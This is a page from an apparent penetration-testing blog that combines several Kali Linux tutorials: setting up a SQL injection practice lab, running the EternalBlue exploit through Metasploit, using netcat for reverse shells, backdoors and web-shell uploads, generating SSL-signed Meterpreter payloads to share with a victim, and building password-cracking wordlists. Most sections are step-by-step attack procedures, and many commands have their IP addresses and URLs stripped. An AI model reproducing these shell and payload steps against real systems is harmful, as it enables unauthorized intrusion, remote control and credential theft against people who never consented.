Showing posts with label Penetration Testing. Show all posts
Showing posts with label Penetration Testing. Show all posts

How to set up SQLI Lab in in Kali

Hello everyone, with the joy of having new kali version somewhere few of us are having hard time in setting Dhakkan (AUDI-1) sql series lab in our kali machine.

So today we’ll be learning how to setup Dhakkan lab (one of the best labs I have seen for practicing and understanding SQL INJECTION) in our latest kali machine.
Download from here

Q - Why it is not as simple as it was in older version of kali?
Ans- In latest version of kali we are having PHP version which does not support MySQL functions because it support MySQLi functions.

MySQLi Extension (or simply known as MySQL improved or MySQLi) is a relational database driver that is used mainly in the PHP programming language. 

So we have 2 ways to set up

1-      Degrade your PHP version to 5.xx
2-      Change code of original Dhakkan lab to make it work with latest kali.
We’ll change code of labs.

Q- How I came to know that this is the issue?
Ans – When I set up my lab and browse it from my browser I saw I was unable to set up database required, See below screenshot

In the above screenshot see the URL .So now I know something is wrong in setup-db.php so I tried to run this specific file in my kali, see screenshot

So after googling the error I came to know I have to replace mysql_connect() with mysqli_connect()

After making this change when I run setup.php again I came across new error, see screenshot

So I replace mysql_query($sql) with mysqli_query($con, $sql)
($con is the connection link we made to our database) if you don’t know php don’t worry simply replace mysql_query($sql) with mysqli_query($con, $sql)
So this is how I debug the issue.
Now I am summarizing the changes that I made and you have to do to set up your lab.
Simply use Ctrl+F and replace all feature to make changes at a fast pace.
You have to make changes in index.php of ALL lessons, other php files in lessons and in all php files present in sql-connections Folder.
(Or you can contact me to get the edited lab)
Replace By

mysqli_query($con, $sql)
mysqli_fetch_array($result, MYSQLI_BOTH)
mysqli_fetch_array($result1, MYSQLI_BOTH)
mysqli_real_escape_string($con, $value)
mysql_select_db($dbname, $con)
mysqli_select_db($con, $dbname)

After making the above changes copy complete sqli-labs folder in /var/www/html folder of kali

 Now open kali terminal and move to this folder using command “cd /var/www/html”

Now give permissions to sqlilabs folder using command “chmod 777 sqlilabs”

Now move to sqlilabs folder using command “cd sqlilabs” And give permissions to all files and folder in it using command “chmod 777 *”

Now your lab is ready to use you can access you lab using your browser Ip of your kali machine/sqlilabs

Click on Setup/reset Database for labs

Database set now practice and enjoy and use you skill to help organizations in securing their apps and applications from hackers. Don’t test it on sites for which you don’t have written permission to do so. It is illegal you may end up going behind the bars and ruin your career.

We are very thankful to Audi-1(aka Dhakkan) for creating such an interesting and awesome environment for us to understand and practice SQL injection.

Exploit Windows PC using EternalBlue SMB Remote Windows Kernel Pool Corruption

This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again.

 Let’s start!!!
Attacker: Kali Linux
Target: window 7

Open the terminal in your Kali Linux type msfconsole to load metasploit framework.


Use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) >set rhost
msf exploit(ms17_010_eternalblue) >set
msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) >exploit

From screenshot you can see we have got meterpreter session after buffer overflow exploited by overwriting SMBV1 buffer.
Meterpreter> sysinfo

Netcat Tutorials for Beginner

In the field of hacking most utilized and powerful tool use by attack is popularly known as “Netcat” which is a computer networking function for analyzing from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable back-end that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool; since it can create almost any kind of connection its user could need and has a number of built-in capabilities.

Netcat is at the same time very easy and multipurpose, it's like trying to explain everything you can do with your Swiss Army knife.
For examples:-

·         Banner garbing
·         Bind shell (backdoor)
·         Chatting
·         File uploading and downloading
·         Port scanning
·         Port knocking
·         Port forwarding
·         Show webserver HTTP file contents

There are so many options inside netcat to enhance it function and effect when you will type nc –h in terminal of kali Linux. Before getting inside its working details you must aware of that here we had use two system one as attacker another as target system.  
Let’s begin

Port Knocking

Open the terminal of your kali Linux and type following command which contains target’s IP and target port number.
Nc 2222

So when the given command will be executed it will tell about hidden running service through knocking the port, from given below image you can observe that port 2222 is open for SSH.

Reverse Shell

Mainly attacker use netcat as backdoor for making unauthorized accessing target’s system, in this an attacker activates listening port (random port) when scan any vulnerable target .

nc –e /bin/bash 4444

Above command will be waiting for reverse connect from victim’s system.
In given screenshot you can see the running web site is suffering from os command injection vulnerability now use nc –e /bin/bash 4444 to establish connection between victim and attacker’s system which will allow unauthorized access by creating backdoor.

Here you can see successfully we have (attacker) access victim’s shell through netcat.

Netcat as a Backdoor
Download netcat.exe for windows and type following command
Nc.exe 4444 –e cmd.exe

From given screenshot you can perceive that attacker successfully get connected with windows client through netcat
Nc –lvp 4444

File Upload Exploitation
We will look how an attacker can exploit file upload vulnerability through netcat shell. From given image it is clear that the targeted webserver allow its client to upload an image.

For uploading we have use php-reverse-shell.php instead of image which a php backdoor. Open this web shell for editing listener IP i.e. your kali Linux IP ( and then activate netcat using following command which will wait for establishing reverse connection with victim’s system.
Nc –lvp 1234

Now after uploading your php backdoor inside web server and execute the file which will connect the victim’s system from attacker machine.

Hence you can see attacker successfully made unauthorized access through netcat shell.

HTTP Request

Use Netcat to fetch web page information from a webserver.  With Netcat you can search out the full HTTP header so you can see running particular site in web server. Now type following command that make a connection to port 80.

Nc 80

From screenshot you can read the detail of http header of the targeted web site.

Port Scanning
Netcat can also scan the TPC & UDP port hence it can be use in the place of NMAP which will tell us about open and close port of the targeted IP

The following command shows target IP and port range

-z:zero-I/O mode [used for scanning]
-w:timeout for connects and final net reads
-v:-v verbose
-l:listen mode, for inbound connects
-n:numeric-only IP addresses,

From resultant image you can see open ports with running services

Netcat is also used for the chatting from between two systems. We require putting together the Netcat to listen on a specific port on both system and connect to specific address.

Nc –lvp 5678

Nc 5678
How are you

File Transfer
As you know in windows we have download netcat.exe file now here I had use it for uploading a text file t.txt on targeted system through specific port.

Nc 5555 < t.txt

Now receiver can download that t.txt file by giving similar port number that will establish connection between both systems.
Nc –lvp 5555 > /root/Desktop/t.txt

Exploit Remote PC with SSL Certified Meterpreter Payload using MPM

Through this article you can learn how an attacker would able to generate a SSL certificate for any exe or bat file payloads so that he might be able to establish a connection with host through meterpreter session.

The firewall spoof the network traffic and verifies trust certificates to establish connection itself as a trusted third party to the session between the client and the server. When the client begins with an SSL session with the server, the firewall capture the client SSL request and forwards the SSL request to the server. The server sends a certificate for the client that is captured by the firewall. If the server certificate is signed by a CA that the firewall trusts, the firewall generates a duplicate of the server certificate signed by the Forward Trust certificate and forward the certificate to the client to authenticate. allows users to secure your staged/stageless connection for Meterpreter by having it check the certificate of the handler it is connecting to.

Open the terminal in your kali Linux and type following to download it………….

Once it downloaded run the program file and follow the given below steps.

Press enter to continue

A prompt will open in which you have to choose option for building certificate from given screenshot you can read I had chosen impersonate domain.

 We start by generating a certificate in PEM format, once the certs have been created we can create a HTTP or HTTPS or EXE payload for it and give it the path of PEM format certificate to be used to validate the connection.

After that again another prompt will open in which you would be ask to mention the domain name, here the SSL certificate will generate for

To have the connection validated we need to tell the payload what certificate  the handler will be using by setting the path to the PEM certificate in the HANDLERSSLCERT option then we enable the checking of this certificate by setting stagerverifysslcert to true.

PEM is a widely used encoding format for security certificates. Syntax and content is defined by X.509 v3 standards for digital certificates, defined in IETF RFC 5280 specifications. The main file extensions are .pem, .crt, .ca-bundle. A PEM certificate is a base64 (ASCII) encoded block of data encapsulated between.
In next prompt choose payload category for auto building payload, from given list I chose stagless (payload.exe)

Once that payload is created we need to create a handler to receive the connection and again we use the PEM certificate so the handler can use the SHA1 hash for validation. Just like with the Payload we set the parameters HANDLERSSLCERT with the path to the PEM file and stagerverifysslcert to true.
 We can see the stage doing the validation when we recite a session back.

 Enter LHOST (attacker’s IP)

Similarly given any random port for reverse connection from host system nd click on ok.
Enter lport 8888

Again list of payload will open from that prompt choose desire payload which will generates payload for attack.

This will configure all setting and start multi handler by lunching metasploit framework

When you move inside output folder here you will get two files; first for exe payload another for .pem certificate. Now use your effort for sharing exe file with your victim and wait for session establishment through meterpretre.

On other hand you can compare .pem certificate from other original certificate signed by CA, if you will observe given below image you can read certification details for which as similar as CA singed certificates.

Hence you can see I have successfully established the meterpreter session with victims system.
Try it by yourself!!!

5 Ways to Create Dictionary for Bruteforcing

We live in digital era, and in the world of technology everything is password protected. There are many ways to crack the password such as social engineering, try and error method, etc. but the three only two most successful methods of password cracking i.e. Dictionary attack and Brute force. Both of them has there perks and disadvantages. And in today’s article we will focus on dictionary attack as it comes handy and is the best method to crack a password.

Dictionary attack: Dictionary attack is an attempted entry in a digital system which uses a precompiled list of possible passwords rather entering them one at a time. Basically, it an evolved and advanced form of trial and error as it brings result fast and is efficient. I am sure that there are many ways for a dictionary attack but I am going to give you five best ones.

The first is Crunch. The best thing about crunch is you can use it both offline and online. It generates wordlist according to your requirements. You can give maximum and minimum length of the password and also provide it with a character-set which you want it use while creating your dictionary. And then crunch will create you dictionary while keeping your requirements at its priority. Hence, a dictionary will be created with all the possible combinations.

Now let’s see how to use it. Observe its syntax first:
crunch -t -o
crunch àcrunch is the key word which notifies the system to use this tool.
à here you specify the minimum length characters you want.
àhere you specify maximum length of characters.
àhere you specify the characters you want it to use while creating the dictionary.
-t à this is optional but here you can specify pattern in with you want your character-set to be.
-o à here you give the path where you want your dictionary file to be saved.
For instance open the terminal of kali and type:

crunch 3 4 ignite –o /root/Desktop/dict.txt

Now the above command will create dictionary with the possible combinations from the word ignite which will length from 3 to 4 characters. The file will be saved in text form on the Desktop. Similar is shown in the image below:

Let’s now read dict.txt file and for that type:
cat dict.txt
All the words will be displayed the following manner:

Next way is by using Cewl. Now Cewl works somewhat like John The ripper and is written in ruby. When targeting people of corporate sector or business world; this is the tool for you. As you all know it is in human psyche to use the words significant to them and which occur in their day to day life. Cewl works on the URL you provide it. It will take that URL and crawl its way to the depth of 2 links (by default, you can increase or decrease the depth to) and will search every word which has the possibility of being a password. With all these words it will generate a wordlist for you to use as your dictionary in dictionary attack. Let’s observe it syntax:

·         cewl -d -w
·         Cewl à indicated the tool which is being used
·         à here give the URL that you want to use as a foundation of your dictionary.
·         -d à here, give the number of links you want it to go through while creating your dictionary.
·         -w à here, give the path where you want to store all the possible passwords.
·         For example in the terminal of kali type :

cewl –d 2 –w /root/Desktop/dict.txt

The above command will create a dictionary file using the word from the URL.

Let’s look the dictionary file it just created and for that type:

cat dict.txt

All the words will be displayed in following manner:

Our next way is using a third party tool i.e. cup. Previous tools were pre-installed but you will have to install this one on your own. To install it please type:

CUPP is developed in python and makes very personalized tool when it comes to password cracking. Studies show that while setting up password, humans show a similar pattern such as they tend make password personalize by adding their date of birth, anniversary date, pet’s name, etc. and CUPP focuses on this weakness and helps to crack password effectively. Before creating a wordlist, it will ask you required information about your target. And will create the wordlist as per the information. Now, let’s study how it works set-by-step. Initiate cupp first by typing:
./ –i
Once initiated it will ask you the information about your target as shown in the image:

Give the required information and your wordlist will be generated as follows:

Next up tool is Pydictor. This is a special tool as it is the only tool that creates the wordlist both in normal words and in base64 encryption. So if someone is smart enough to keep a safe password this tool will help you with it. Pydictor is written in python. There are two method to crack the password using this tool à one creates a normal wordlist the other creates wordlist in base64 form. We will try both the methods. But first things first, this is a third party tool so we will have to install it and for it please type :
git clone

Once the tool is installed and ready to use, give it instructions on bases of what you want it to generate the wordlist using. Understand the syntax first:
./ –len -base d –o
·         ./ à initiates the tool
·         --len à indicates the length of characters
·         à here, give minimum length of characters
·         à here, give  maximum length of characters
·         -o à indicates the path
·         à here, give path where you want your wordlist to be saved
Let’s give the command to generate the wordlist now:
./ –len 5 5 –base d –o /root/Desktop/dict.txt

Let’s read the file created to have a look at the words that it has generated. And for that type:
cat dict.txt/BASE_5_5_d_071743.txt

The other method using the similar tool gives us password in base64 encoding. Let’s study the syntax first:
./ –len -base d –encode –o
·         ./ à initiates the tool
·         --len à indicates the length of characters
·         à here, give minimum length of characters
·         à here, give  maximum length of characters
·         --encode à indicated the type of encryption/encoding
·         à here, give the type of encoding you want
·         -o à indicates the path
·         à here, give path where you want your wordlist to be saved
Let’s give the command to generate wordlist:
./ –len 5 5 –encode b64 –o /root/Desktop/dict.txt

The above command will generate wordlist in base64 let’s have a look at it:
cat dict.txt/BASE_5_5_d_070433.txt

The last and next up tool is Dymerge. Dymerge is interesting and powerful tool made in python. Basically what dymerge does is takes the previously made multiple dictionaries and merges them into a single one, so all the dictionaries can you use in one go while you sit back and relax. You can merge any number of dictionaries either default ones or custom made. This is again a third party tool so let’s install it first:
git clone

Let’s understand its syntax:
python -s –o
·         Python à initiates the tool
·         à here, give path of the first dictionary you want to merge
·         à here, give path of the second dictionary you want to merge
·         -o à indicates the path where the resulted wordlist will be saved
·         à here, give the path where the final wordlist list will be saved
Now that we have understood the syntax let’s try the command:
python /root/Desktop/digit.txt /root/Desktop/words.txt –s –o /root/Desktop/dict.txt
Here, I have taken two wordlists (you can take more also), where one contains numbers and other contains alphabets and merges them into one so you can use multiple dictionaries at the same time.

Let’s have a look at the dictionary that it has created:
cat  dict-1.txt